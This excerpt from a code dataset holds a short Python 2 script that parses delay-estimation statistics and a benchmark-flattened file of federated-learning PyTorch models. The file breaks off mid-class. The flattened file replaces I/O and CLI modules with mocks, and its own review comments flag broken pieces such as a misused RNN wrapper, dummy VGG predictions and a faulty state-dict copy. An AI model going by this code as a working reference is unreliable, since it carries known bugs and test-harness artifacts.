# text stringlengths 38 1.54M |
# |---|
#!/bin/python
import sys
import json
print "Parsing Delay-estimation statistics ..."
# Read the stdin for the data.
for line in sys.stdin:
# Only handle the specific entires.
if (not "DELAY-ESTIMATOR-JSON:" in line) :
continue
# print line
chainDelay = json.loads(line[len("DELAY-ESTIMATOR-JSON:"):])
error = chainDelay["BLACKBOX"] - chainDelay["ACCURATE"]
error_rate = error / chainDelay["ACCURATE"]
print line, error, ((error_rate) * 100), '%'
# |
# ---------------------------------------------------------------------------
# Auto-generated module-name stubs (paritybench flattening artifact).
# The original project ships these names as separate modules; this flattened
# benchmark file aliases every one of them to the current module object so
# that references to those module names still resolve without the package
# layout. Repeated names (e.g. ``dataloader``) simply rebind the same alias.
# ---------------------------------------------------------------------------
import sys
_module = sys.modules[__name__]
del sys  # drop the temporary binding; a mocked ``sys`` is installed later
core = _module
client = _module
config = _module
dataloader = _module
dataset = _module
evaluation = _module
federated = _module
metrics = _module
model = _module
schema = _module
server = _module
strategies = _module
base = _module
dga = _module
fedavg = _module
utils = _module
trainer = _module
conf = _module
e2e_trainer = _module
experiments = _module
cifar_dataset = _module
dataloader = _module
model = _module
centralized_training = _module
download_and_convert_data = _module
data = _module
dataloader = _module
model = _module
model_vgg = _module
dataloader = _module
preprocess = _module
model = _module
dataloader = _module
preprocessing = _module
model = _module
dataloader = _module
group_normalization = _module
model = _module
dataloader = _module
model = _module
dataloader = _module
dataset = _module
preprocess_mind = _module
fednewsrec_model = _module
model = _module
dataloader = _module
model = _module
trainer_pt_utils = _module
trainer_utils = _module
dataloader = _module
model = _module
utility = _module
dataloader = _module
model = _module
RL = _module
extensions = _module
privacy = _module
analysis = _module
dp_kmeans = _module
metrics = _module
quant = _module
build_vocab = _module
create_data = _module
test_e2e_trainer = _module
data_utils = _module
dataloaders_utils = _module
adamW = _module
lamb = _module
lars = _module
from_json_to_hdf5 = _module
utils = _module
from _paritybench_helpers import _mock_config, patch_functional
from unittest.mock import mock_open, MagicMock
from torch.autograd import Function
from torch.nn import Module
import abc, collections, copy, enum, functools, inspect, itertools, logging, math, matplotlib, numbers, numpy, pandas, queue, random, re, scipy, sklearn, string, tensorflow, time, torch, torchaudio, torchtext, torchvision, types, typing, uuid, warnings
import numpy as np
from torch import Tensor
# ---------------------------------------------------------------------------
# Test-harness shims (paritybench). These replace I/O and CLI facilities
# with mocks so the flattened file can be imported without touching the
# filesystem or a real command line.
# ---------------------------------------------------------------------------
patch_functional()
open = mock_open()  # NOTE(review): shadows builtins.open for the whole module
yaml = logging = sys = argparse = MagicMock()
ArgumentParser = argparse.ArgumentParser
_global_config = args = argv = cfg = config = params = _mock_config()
# Any parsed CLI args / loaded YAML resolve to the same mock config object.
argparse.ArgumentParser.return_value.parse_args.return_value = _global_config
yaml.load.return_value = _global_config
sys.argv = _global_config
__version__ = '1.0.0'
xrange = range  # Python-2 compatibility alias
wraps = functools.wraps
import copy
import logging
import time
import numpy as np
import torch
from collections.abc import MutableMapping
from torch.utils.data import DataLoader as PyTorchDataLoader
from abc import ABC
from torch.utils.data import Dataset as PyTorchDataset
from abc import abstractmethod
import torch.distributed as dist
import torch as T
import random
from collections import defaultdict
import math
import re
import torch.nn as nn
from torch import nn
from torch.nn import functional as F
from sklearn.metrics import f1_score
import torchvision
import torchvision.transforms as transforms
import torch.nn.functional as F
import torch.optim as optim
from torch import Tensor
from torch.utils.model_zoo import load_url as load_state_dict_from_url
from typing import Type
from typing import Any
from typing import Callable
from typing import Union
from typing import List
from typing import Optional
from torch.nn.modules.batchnorm import _BatchNorm
import torch.utils.model_zoo as model_zoo
from torch.nn import CrossEntropyLoss
from sklearn.metrics import roc_auc_score
from torch.utils.data import RandomSampler
from torch.utils.data import SequentialSampler
from typing import Dict
from typing import Tuple
import warnings
from typing import Iterator
from torch.utils.data.dataset import Dataset
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data.sampler import RandomSampler
from torch.utils.data.sampler import Sampler
from typing import NamedTuple
from collections import OrderedDict
from scipy.special import betainc
from scipy.special import betaln
from copy import deepcopy
from torch.utils.data import sampler
from torch.optim import Optimizer
import collections
import functools
from torch.optim.lr_scheduler import StepLR
from torch.optim.lr_scheduler import MultiStepLR
from torch.optim.lr_scheduler import ReduceLROnPlateau
class BaseModel(ABC, T.nn.Module):
    """Abstract wrapper around a PyTorch model used by the framework.

    Concrete subclasses must implement ``__init__``, ``loss`` and
    ``inference``; the ``set_eval``/``set_train`` helpers simply toggle
    the underlying ``nn.Module`` mode.
    """

    @abstractmethod
    def __init__(self, **kwargs):
        super(BaseModel, self).__init__()

    @abstractmethod
    def loss(self, input):
        """Run a forward pass and return the training loss tensor."""
        ...

    @abstractmethod
    def inference(self, input):
        """Run a forward pass and return evaluation metrics.

        Returns:
            dict: must contain at least ``output``, ``acc`` and
            ``batch_size``. Extra metrics may be reported as
            ``{'value': v, 'higher_is_better': bool}`` entries.
        """
        ...

    def set_eval(self):
        """Switch the wrapped model to evaluation mode."""
        self.eval()

    def set_train(self):
        """Switch the wrapped model to training mode."""
        self.train()
class Swish(nn.Module):
    """SiLU-style activation: ``x * sigmoid(x)``."""

    def forward(self, x):
        gate = torch.sigmoid(x)
        return gate * x
class ConvNormPool(nn.Module):
    """Conv Skip-connection module.

    Three stacked 1-D convolutions with normalization and Swish
    activations; the first convolution's output is added to the third
    convolution's output (skip connection) before the final
    normalization, and a max-pool halves the temporal length.

    Args:
        input_size: number of input channels.
        hidden_size: number of channels in every conv layer.
        kernel_size: temporal kernel width; left-padding of
            ``kernel_size - 1`` keeps lengths aligned between stages.
        norm_type: ``'group'`` selects GroupNorm with 8 groups; any
            other value (including the misspelled default ``'bachnorm'``)
            falls through to BatchNorm1d.
    """

    def __init__(self, input_size, hidden_size, kernel_size, norm_type='bachnorm'):
        super().__init__()
        self.kernel_size = kernel_size
        self.conv_1 = nn.Conv1d(in_channels=input_size, out_channels=hidden_size, kernel_size=kernel_size)
        self.conv_2 = nn.Conv1d(in_channels=hidden_size, out_channels=hidden_size, kernel_size=kernel_size)
        self.conv_3 = nn.Conv1d(in_channels=hidden_size, out_channels=hidden_size, kernel_size=kernel_size)
        self.swish_1 = Swish()
        self.swish_2 = Swish()
        self.swish_3 = Swish()
        if norm_type == 'group':
            self.normalization_1 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
            self.normalization_2 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
            self.normalization_3 = nn.GroupNorm(num_groups=8, num_channels=hidden_size)
        else:
            self.normalization_1 = nn.BatchNorm1d(num_features=hidden_size)
            self.normalization_2 = nn.BatchNorm1d(num_features=hidden_size)
            self.normalization_3 = nn.BatchNorm1d(num_features=hidden_size)
        self.pool = nn.MaxPool1d(kernel_size=2)

    def forward(self, input):
        conv1 = self.conv_1(input)
        x = self.normalization_1(conv1)
        x = self.swish_1(x)
        # Left-pad by kernel_size - 1 so conv_2 produces the same length
        # that conv_1 produced.
        x = F.pad(x, pad=(self.kernel_size - 1, 0))
        x = self.conv_2(x)
        x = self.normalization_2(x)
        x = self.swish_2(x)
        x = F.pad(x, pad=(self.kernel_size - 1, 0))
        conv3 = self.conv_3(x)
        # Skip connection: conv_1 and conv_3 outputs have matching
        # lengths thanks to the pads above.
        x = self.normalization_3(conv1 + conv3)
        x = self.swish_3(x)
        x = F.pad(x, pad=(self.kernel_size - 1, 0))
        # Halve the temporal dimension.
        x = self.pool(x)
        return x
class nlp_rnn_fedshakespeare(nn.Module):
    """Character-level LSTM language model for the FedShakespeare task.

    Embeds input tokens, runs a 2-layer LSTM, and projects every
    timestep to vocabulary logits. The result is transposed to
    ``(batch, vocab, seq)`` so it feeds directly into
    ``nn.CrossEntropyLoss``.
    """

    def __init__(self, embedding_dim=8, vocab_size=90, hidden_size=256):
        super(nlp_rnn_fedshakespeare, self).__init__()
        # padding_idx=0 keeps the padding token's embedding frozen at zero.
        self.embeddings = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=0)
        self.lstm = nn.LSTM(input_size=embedding_dim, hidden_size=hidden_size, num_layers=2, batch_first=True)
        self.fc = nn.Linear(hidden_size, vocab_size)

    def forward(self, input_seq):
        embeds = self.embeddings(input_seq)
        lstm_out, _ = self.lstm(embeds)
        # Project every timestep. (The original also sliced out an unused
        # "final hidden state" local and applied a no-op [:, :] slice;
        # both removed.)
        output = self.fc(lstm_out)
        # -> (batch, vocab, seq) for CrossEntropyLoss.
        return torch.transpose(output, 1, 2)
class RNN(BaseModel):
    """Framework wrapper around the FedShakespeare LSTM."""

    def __init__(self, model_config):
        super().__init__()
        self.net = nlp_rnn_fedshakespeare()

    def loss(self, input: torch.Tensor) -> torch.Tensor:
        """Cross-entropy over non-padding tokens (ignore_index=0)."""
        x, target = input['x'], input['y']
        output = self.net.forward(x)
        criterion = nn.CrossEntropyLoss(ignore_index=0)
        return criterion(output, target.long())

    def inference(self, input):
        """Token-level accuracy over non-padding positions."""
        x, target = input['x'], input['y']
        output = self.net.forward(x)
        n_samples = x.shape[0]
        pred = torch.argmax(output, dim=1)
        mask = target != 0
        correct = torch.sum((pred[mask] == target[mask]).float()).item()
        # BUG FIX: the original divided a float by the tensor mask.sum(),
        # so 'acc' was reported as a 0-dim tensor; .item() yields a float.
        accuracy = correct / mask.sum().item()
        return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class Net(nn.Module):
    """Classifier: two ConvNormPool stages, a recurrent layer, attention
    over its hidden states, and a softmax head.

    NOTE(review): ``RNN(input_size=46, hid_size=...)`` resolves to the
    ``RNN`` wrapper class defined earlier in this flattened file (which
    expects a ``model_config`` dict), not ``nn.RNN`` — this looks like a
    name-shadowing artifact of the flattening; confirm against the
    original module layout before relying on this class.
    """

    def __init__(self, input_size=1, hid_size=64, n_classes=5, kernel_size=5):
        super().__init__()
        self.rnn_layer = RNN(input_size=46, hid_size=hid_size)
        self.conv1 = ConvNormPool(input_size=input_size, hidden_size=hid_size, kernel_size=kernel_size)
        self.conv2 = ConvNormPool(input_size=hid_size, hidden_size=hid_size, kernel_size=kernel_size)
        self.avgpool = nn.AdaptiveMaxPool1d(1)
        self.attn = nn.Linear(hid_size, hid_size, bias=False)
        self.fc = nn.Linear(in_features=hid_size, out_features=n_classes)

    def forward(self, input):
        x = self.conv1(input)
        x = self.conv2(x)
        # Recurrent pass; hid_states holds the layer hidden states.
        x_out, hid_states = self.rnn_layer(x)
        # Concatenate two hidden states and attend over the result.
        x = torch.cat([hid_states[0], hid_states[1]], dim=0).transpose(0, 1)
        x_attn = torch.tanh(self.attn(x))
        x = x_attn.bmm(x_out)
        x = x.transpose(2, 1)
        x = self.avgpool(x)
        x = x.view(-1, x.size(1) * x.size(2))
        # Softmax applied inside the model: output is class probabilities.
        x = F.softmax(self.fc(x), dim=-1)
        return x
class CNN_DropOut(torch.nn.Module):
    """CNN recommended by "Adaptive Federated Optimization"
    (https://arxiv.org/pdf/2003.00295.pdf), used for EMNIST experiments.

    Two 3x3 convolutions, a 2x2 max-pool, two dropout stages and two
    dense layers (~1.2M parameters for the 10-class variant).

    Args:
        only_digits: if True, 10 output classes for digits-only MNIST
            (http://yann.lecun.com/exdb/mnist/); otherwise 62 outputs
            for Federated Extended MNIST (FEMNIST,
            https://arxiv.org/abs/1702.05373).
    """

    def __init__(self, only_digits=True):
        super(CNN_DropOut, self).__init__()
        self.conv2d_1 = torch.nn.Conv2d(1, 32, kernel_size=3)
        self.max_pooling = nn.MaxPool2d(2, stride=2)
        self.conv2d_2 = torch.nn.Conv2d(32, 64, kernel_size=3)
        self.dropout_1 = nn.Dropout(0.25)
        self.flatten = nn.Flatten()
        self.linear_1 = nn.Linear(9216, 128)
        self.dropout_2 = nn.Dropout(0.5)
        self.linear_2 = nn.Linear(128, 10 if only_digits else 62)
        self.relu = nn.ReLU()

    def forward(self, x):
        # Insert the channel axis, then run the fixed layer pipeline.
        out = x.unsqueeze(1)
        pipeline = (
            self.conv2d_1, self.relu,
            self.conv2d_2, self.relu,
            self.max_pooling, self.dropout_1,
            self.flatten,
            self.linear_1, self.relu, self.dropout_2,
            self.linear_2,
        )
        for stage in pipeline:
            out = stage(out)
        return out
class CNN(BaseModel):
    """Framework wrapper around the FEMNIST CNN (62-class variant)."""

    def __init__(self, model_config):
        super().__init__()
        self.net = CNN_DropOut(False)

    def loss(self, input: torch.Tensor) -> torch.Tensor:
        """Cross-entropy loss on a batch dict with keys 'x' and 'y'.

        The unused per-call ``device`` probe from the original was dead
        code and has been removed.
        """
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        criterion = nn.CrossEntropyLoss()
        return criterion(output, labels.long())

    def inference(self, input):
        """Top-1 accuracy on a batch dict with keys 'x' and 'y'."""
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        n_samples = features.shape[0]
        accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
        return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
def conv3x3(in_planes, out_planes, stride=1):
    """Return a bias-free 3x3 convolution with 1-pixel padding."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
def group_norm(input, group, running_mean, running_var, weight=None, bias=None, use_input_stats=True, momentum=0.1, eps=1e-05):
    """Applies Group Normalization for channels in the same group in each data sample in a
    batch.
    See :class:`~torch.nn.GroupNorm1d`, :class:`~torch.nn.GroupNorm2d`,
    :class:`~torch.nn.GroupNorm3d` for details.

    Implementation note: the input is reshaped to
    ``(1, B * C / group, group, ...)`` and normalized with
    ``F.batch_norm``; affine parameters and running statistics are
    repeated once per sample so statistics are computed per
    (sample, channel-group) pair.
    """
    if not use_input_stats and (running_mean is None or running_var is None):
        raise ValueError('Expected running_mean and running_var to be not None when use_input_stats=False')
    b, c = input.size(0), input.size(1)
    # Repeat affine parameters per sample: after the reshape below, the
    # "channel" axis of batch_norm enumerates (sample, group) pairs.
    if weight is not None:
        weight = weight.repeat(b)
    if bias is not None:
        bias = bias.repeat(b)

    def _instance_norm(input, group, running_mean=None, running_var=None, weight=None, bias=None, use_input_stats=None, momentum=None, eps=None):
        # Keep a handle on the original buffers so updated running stats
        # can be averaged over the batch and written back afterwards.
        if running_mean is not None:
            running_mean_orig = running_mean
            running_mean = running_mean_orig.repeat(b)
        if running_var is not None:
            running_var_orig = running_var
            running_var = running_var_orig.repeat(b)
        input_reshaped = input.contiguous().view(1, int(b * c / group), group, *input.size()[2:])
        out = F.batch_norm(input_reshaped, running_mean, running_var, weight=weight, bias=bias, training=use_input_stats, momentum=momentum, eps=eps)
        # Fold the per-sample running stats back into the shared buffers.
        if running_mean is not None:
            running_mean_orig.copy_(running_mean.view(b, int(c / group)).mean(0, keepdim=False))
        if running_var is not None:
            running_var_orig.copy_(running_var.view(b, int(c / group)).mean(0, keepdim=False))
        return out.view(b, c, *input.size()[2:])

    return _instance_norm(input, group, running_mean=running_mean, running_var=running_var, weight=weight, bias=bias, use_input_stats=use_input_stats, momentum=momentum, eps=eps)
class _GroupNorm(_BatchNorm):
    """Base class for the GroupNorm layers built on top of ``_BatchNorm``.

    The parent's buffers and affine parameters are sized per group
    (``num_features / num_groups``); the actual normalization is
    delegated to :func:`group_norm`.
    """

    def __init__(self, num_features, num_groups=1, eps=1e-05, momentum=0.1, affine=False, track_running_stats=False):
        self.num_groups = num_groups
        self.track_running_stats = track_running_stats
        # Parent state is allocated per group, not per channel.
        super(_GroupNorm, self).__init__(int(num_features / num_groups), eps, momentum, affine, track_running_stats)

    def _check_input_dim(self, input):
        # Subclasses enforce the expected rank (4D for 2d, 5D for 3d).
        return NotImplemented

    def forward(self, input):
        self._check_input_dim(input)
        # Use batch statistics while training or when stats aren't tracked.
        return group_norm(input, self.num_groups, self.running_mean, self.running_var, self.weight, self.bias, self.training or not self.track_running_stats, self.momentum, self.eps)
class GroupNorm2d(_GroupNorm):
    """Applies Group Normalization over a 4D input (a mini-batch of 2D inputs
    with additional channel dimension) as described in the paper
    https://arxiv.org/pdf/1803.08494.pdf
    `Group Normalization`_ .
    Args:
        num_features: :math:`C` from an expected input of size
            :math:`(N, C, H, W)`
        num_groups: number of channel groups to normalize over
        eps: a value added to the denominator for numerical stability. Default: 1e-5
        momentum: the value used for the running_mean and running_var computation. Default: 0.1
        affine: a boolean value that when set to ``True``, this module has
            learnable affine parameters. Default: ``True``
        track_running_stats: a boolean value that when set to ``True``, this
            module tracks the running mean and variance, and when set to ``False``,
            this module does not track such statistics and always uses batch
            statistics in both training and eval modes. Default: ``False``
    Shape:
        - Input: :math:`(N, C, H, W)`
        - Output: :math:`(N, C, H, W)` (same shape as input)
    Examples:
        >>> # Without Learnable Parameters
        >>> m = GroupNorm2d(100, 4)
        >>> # With Learnable Parameters
        >>> m = GroupNorm2d(100, 4, affine=True)
        >>> input = torch.randn(20, 100, 35, 45)
        >>> output = m(input)
    """

    def _check_input_dim(self, input):
        # Image-style inputs only: batch, channels, height, width.
        if input.dim() != 4:
            raise ValueError('expected 4D input (got {}D input)'.format(input.dim()))
def norm2d(planes, num_channels_per_group=32):
    """Return a 2-D normalization layer for ``planes`` channels.

    Args:
        planes: number of feature channels to normalize.
        num_channels_per_group: group size for GroupNorm; ``0`` (or any
            non-positive value) selects plain BatchNorm2d instead.
    """
    # The original body contained a stray bare ``None`` expression (a
    # leftover from a stripped print call); it has been removed.
    if num_channels_per_group > 0:
        return GroupNorm2d(planes, num_channels_per_group, affine=True, track_running_stats=False)
    return nn.BatchNorm2d(planes)
class BasicBlock(nn.Module):
    """Standard two-convolution ResNet block with a residual connection.

    ``group_norm`` is forwarded to :func:`norm2d` as the
    channels-per-group (0 selects BatchNorm).
    """
    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None, group_norm=0):
        super(BasicBlock, self).__init__()
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = norm2d(planes, group_norm)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = norm2d(planes, group_norm)
        self.downsample = downsample  # projection for shape-changing skips
        self.stride = stride

    def forward(self, x):
        residual = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = self.conv2(out)
        out = self.bn2(out)
        # Project the skip path when the main path changed shape.
        if self.downsample is not None:
            residual = self.downsample(x)
        out += residual
        out = self.relu(out)
        return out
class Bottleneck(nn.Module):
    """ResNet bottleneck block: 1x1 reduce -> 3x3 -> 1x1 expand (x4)."""
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None, group_norm=0):
        super(Bottleneck, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = norm2d(planes, group_norm)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
        self.bn2 = norm2d(planes, group_norm)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = norm2d(planes * 4, group_norm)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample  # projection for shape-changing skips
        self.stride = stride

    def forward(self, x):
        residual = x
        out = self.conv1(x)
        out = self.bn1(out)
        out = self.relu(out)
        out = self.conv2(out)
        out = self.bn2(out)
        out = self.relu(out)
        out = self.conv3(out)
        out = self.bn3(out)
        # Project the skip path when the main path changed shape.
        if self.downsample is not None:
            residual = self.downsample(x)
        out += residual
        out = self.relu(out)
        return out
class ResNet(nn.Module):
    """ResNet backbone parameterized by block type and stage depths.

    Args:
        block: ``BasicBlock`` or ``Bottleneck``.
        layers: number of blocks in each of the four stages.
        num_classes: size of the final linear classifier.
        group_norm: channels-per-group for :func:`norm2d` (0 = BatchNorm).
    """

    def __init__(self, block, layers, num_classes=1000, group_norm=0):
        self.inplanes = 64
        super(ResNet, self).__init__()
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3, bias=False)
        self.bn1 = norm2d(64, group_norm)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0], group_norm=group_norm)
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2, group_norm=group_norm)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2, group_norm=group_norm)
        self.layer4 = self._make_layer(block, 512, layers[3], stride=2, group_norm=group_norm)
        self.avgpool = nn.AvgPool2d(1)
        self.fc = nn.Linear(512 * block.expansion, num_classes)
        # He-style init for convs; unit scale / zero shift for norms.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2.0 / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, GroupNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
        # Zero the scale of the last norm in each residual block —
        # presumably so residual branches start near-identity
        # ("zero-gamma" trick); the code only shows the fill_(0).
        for m in self.modules():
            if isinstance(m, Bottleneck):
                m.bn3.weight.data.fill_(0)
            if isinstance(m, BasicBlock):
                m.bn2.weight.data.fill_(0)

    def _make_layer(self, block, planes, blocks, stride=1, group_norm=0):
        # Build one stage; only the first block may downsample/expand,
        # in which case the skip path gets a 1x1 projection.
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(nn.Conv2d(self.inplanes, planes * block.expansion, kernel_size=1, stride=stride, bias=False), norm2d(planes * block.expansion, group_norm))
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample, group_norm))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes, group_norm=group_norm))
        return nn.Sequential(*layers)

    def forward(self, x):
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        x = self.avgpool(x)
        x = x.view(x.size(0), -1)
        x = self.fc(x)
        return x
class VGG(nn.Module):
    """VGG-style classifier for CIFAR-sized (3x32x32) inputs.

    Args:
        vgg: the convolutional feature extractor (an ``nn.Module``) whose
            flattened output must have 512 features.
        num_class: number of output classes.
        topK_results: how many top predictions to report; defaults to
            ``num_class``.
    """

    def __init__(self, vgg, num_class, topK_results=None):
        super(VGG, self).__init__()
        self.topK_results = num_class if topK_results is None else topK_results
        self.vgg = vgg
        self.classifier = nn.Sequential(nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Dropout(), nn.Linear(512, 512), nn.ReLU(True), nn.Linear(512, num_class))
        # NOTE: the original contained a dead ``if 0:`` weight-init block;
        # it could never execute and has been removed.

    def forward(self, inputs):
        """Forward a batch dict with key 'x' holding flattenable images."""
        # The original wrapped this lookup in a CUDA ternary whose two
        # branches were identical; simplified to a plain lookup.
        x = inputs['x']
        x = self.vgg(x.view(-1, 3, 32, 32))
        x = T.flatten(x, 1)
        x = self.classifier(x)
        return x

    def loss(self, inputs):
        """Cross-entropy loss on a batch dict with keys 'x' and 'y'."""
        targets = inputs['y']
        output = self(inputs)
        loss = T.nn.functional.cross_entropy(output, targets)
        return loss

    def inference(self, inputs):
        """Forward pass plus accuracy/probability reporting.

        NOTE(review): 'predictions' is ``np.arange`` over the batch, not
        the argmax of the output — looks wrong, but preserved as-is
        since downstream consumers may depend on it; confirm intent.
        """
        targets = inputs['y']
        output = self(inputs)
        accuracy = T.mean((T.argmax(output, dim=1) == targets).float()).item()
        output = {'probabilities': output.cpu().detach().numpy(), 'predictions': np.arange(0, targets.shape[0]), 'labels': targets.cpu().numpy()}
        return {'output': output, 'val_acc': accuracy, 'batch_size': targets.shape[0]}

    def get_logit(self, inputs=None, evalis=True, logmax=False):
        """Return (softmax-or-logsoftmax outputs, targets, CE loss).

        NOTE(review): ``self.forward(data)`` indexes ``data['x']``, so
        ``data`` must be a batch-dict, not a raw tensor — verify callers.
        """
        data, targets = inputs
        Softmax = T.nn.LogSoftmax(dim=1) if logmax else T.nn.Softmax(dim=1)
        if evalis:
            self.eval()
            with T.no_grad():
                output = self.forward(data)
                logits = Softmax(output)
        else:
            self.train()
            output = self.forward(data)
            logits = Softmax(output)
        loss = T.nn.functional.cross_entropy(output, targets)
        return logits.cpu(), targets.cpu(), loss.cpu()

    def copy_state_dict(self, state_dict):
        # NOTE(review): this assigns over the *method* ``state_dict`` and
        # calls ``.clone()``, which plain (Ordered)dicts do not provide —
        # almost certainly broken; preserved byte-for-byte pending
        # confirmation of intent (likely should be load_state_dict).
        self.state_dict = state_dict.clone()

    def set_eval(self):
        """Bring the model into evaluation mode."""
        self.eval()

    def set_train(self):
        """Bring the model into train mode."""
        self.train()
class LogisticRegression(torch.nn.Module):
    """Logistic regression over flattened 28x28 images.

    Note: the forward pass applies an element-wise sigmoid (not a
    softmax) to the linear scores, matching the original implementation.
    """

    def __init__(self, input_dim, output_dim):
        super(LogisticRegression, self).__init__()
        self.linear = torch.nn.Linear(input_dim, output_dim)

    def forward(self, x):
        flattened = x.view(-1, 28 * 28)
        return torch.sigmoid(self.linear(flattened))
class LR(BaseModel):
    """Framework wrapper around the logistic-regression model."""

    def __init__(self, model_config):
        super().__init__()
        self.net = LogisticRegression(model_config['input_dim'], model_config['output_dim'])

    def loss(self, input: torch.Tensor) -> torch.Tensor:
        """Cross-entropy loss on a batch dict with keys 'x' and 'y'.

        The unused per-call ``device`` probe from the original was dead
        code and has been removed.
        """
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        criterion = nn.CrossEntropyLoss()
        return criterion(output, labels.long())

    def inference(self, input):
        """Top-1 accuracy on a batch dict with keys 'x' and 'y'."""
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        n_samples = features.shape[0]
        accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
        return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class GroupNorm3d(_GroupNorm):
    """
    Assume the data format is (B, C, D, H, W)
    """

    def _check_input_dim(self, input):
        # Volumetric inputs only: batch, channels, depth, height, width.
        if input.dim() != 5:
            raise ValueError('expected 5D input (got {}D input)'.format(input.dim()))
model_urls = {'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth', 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth', 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth', 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth', 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth'}
def resnet18(pretrained=False, **kwargs):
    """Constructs a ResNet-18 model.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        **kwargs: forwarded to :class:`ResNet` (e.g. ``num_classes``,
            ``group_norm``).
    """
    model = ResNet(BasicBlock, [2, 2, 2, 2], **kwargs)
    if pretrained:
        # Download and load torchvision's ImageNet checkpoint.
        model.load_state_dict(model_zoo.load_url(model_urls['resnet18']))
    return model
class RESNET(BaseModel):
    """Framework wrapper around an (un-pretrained) ResNet-18."""

    def __init__(self, model_config):
        super().__init__()
        self.net = resnet18()

    def loss(self, input: torch.Tensor) -> torch.Tensor:
        """Cross-entropy loss on a batch dict with keys 'x' and 'y'.

        The unused per-call ``device`` probe from the original was dead
        code and has been removed.
        """
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        return F.cross_entropy(output, labels.long())

    def inference(self, input):
        """Top-1 accuracy on a batch dict with keys 'x' and 'y'."""
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        n_samples = features.shape[0]
        accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
        return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class SuperNet(BaseModel):
    """Framework wrapper around :class:`Net`."""

    def __init__(self, model_config):
        super().__init__()
        self.net = Net()

    def loss(self, input: torch.Tensor):
        """Cross-entropy loss on a batch dict with keys 'x' and 'y'.

        The unused per-call ``device`` probe from the original was dead
        code and has been removed.
        """
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        return F.cross_entropy(output, labels.long())

    def inference(self, input):
        """Top-1 accuracy on a batch dict with keys 'x' and 'y'."""
        features, labels = input['x'], input['y']
        output = self.net.forward(features)
        n_samples = features.shape[0]
        accuracy = torch.mean((torch.argmax(output, dim=1) == labels).float()).item()
        return {'output': output, 'acc': accuracy, 'batch_size': n_samples}
class AttentivePooling(nn.Module):
    """Additive attention pooling over the sequence (second) axis."""

    def __init__(self, dim1: int, dim2: int):
        super(AttentivePooling, self).__init__()
        self.dim1 = dim1
        self.dim2 = dim2
        self.dropout = nn.Dropout(0.2)
        self.dense = nn.Linear(dim2, 200)
        self.tanh = nn.Tanh()
        self.dense2 = nn.Linear(200, 1)
        self.softmax = nn.Softmax(dim=1)

    def forward(self, x):
        # Score each position, normalize the scores, then take the
        # attention-weighted sum over the sequence axis.
        vecs = self.dropout(x)
        scores = self.dense2(self.tanh(self.dense(vecs))).squeeze(2)
        weights = self.softmax(scores)
        return torch.einsum('ijk,ij->ik', vecs, weights)

    def fromTensorFlow(self, tfmodel):
        """Copy weights from the equivalent Keras model (layers 1 and 2)."""
        for torch_layer, keras_layer in ((self.dense, tfmodel.layers[1]), (self.dense2, tfmodel.layers[2])):
            kernel, bias = keras_layer.get_weights()
            torch_layer.weight.data = torch.tensor(kernel).transpose(0, 1)
            torch_layer.bias.data = torch.tensor(bias)
class Attention(nn.Module):
    """Multi-head scaled dot-product attention.

    ``output_dim = nb_head * size_per_head``; the Q/K/V projections are
    bias-free linear layers with xavier-uniform init (gain sqrt(2)).
    """

    def __init__(self, input_dim, nb_head, size_per_head, **kwargs):
